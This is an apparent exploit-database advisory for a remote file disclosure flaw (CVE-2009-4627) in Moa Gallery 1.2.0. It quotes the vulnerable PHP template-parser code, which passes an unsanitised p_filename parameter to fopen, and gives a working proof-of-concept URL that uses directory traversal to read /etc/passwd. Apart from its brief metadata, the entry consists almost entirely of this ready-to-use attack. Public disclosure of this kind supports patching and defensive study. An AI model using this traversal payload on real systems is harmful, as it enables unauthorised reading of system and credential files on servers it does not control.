Moa Gallery 1.2.0 - 'p_filename' Remote File Disclosure
Author: GoLd_M type: webapps platform: php port: date_added: 2009-08-25 date_updated: verified: 1 codes: OSVDB-61858;CVE-2009-4627 tags: aliases: screenshot_url: application_url: raw file: 9525.txt
Moa Gallery <= 1.2.0 Remote File Disclosure Vulnerability Code In sources\_template_parser.php $filename = $MOA_PATH."templates/".$template_name."/".$p_filename; $fp = @fopen($filename, "r"); if ((!$fp) && (is_bool($fp))) { $fp = $fp = @fopen($MOA_PATH."templates/MoaDefault/".$p_filename, "r"); POC /sources/_template_parser.php?p_filename=../../../../../../../../../../../../../../../etc/passwd # milw0rm.com [2009-08-26]